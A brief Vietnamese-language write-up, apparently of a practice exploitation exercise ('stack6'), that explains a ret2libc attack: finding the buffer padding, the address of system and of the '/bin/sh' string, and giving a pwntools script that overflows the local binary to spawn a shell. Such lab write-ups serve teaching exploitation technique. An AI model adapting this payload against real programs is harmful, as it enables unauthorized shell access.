bài này ta phải ret2libc
đầu tiên mình sẽ tìm padding

tiếp theo mình sẽ tìm system để gọi chuỗi "/bin/sh"

xâu đó tìm địa chỉ của chuỗi "/bin/sh" để ret

và đây là script để exploit
```
from pwn import *
p = process('./stack6')
padding = b'a'*80
system = 0xf7c4c8c0
bin_sh = 0xf7db5fc8
payload = padding + p32(system) + p32(0) + p32(bin_sh)
p.sendline(payload)
p.interactive()
```

v là thành công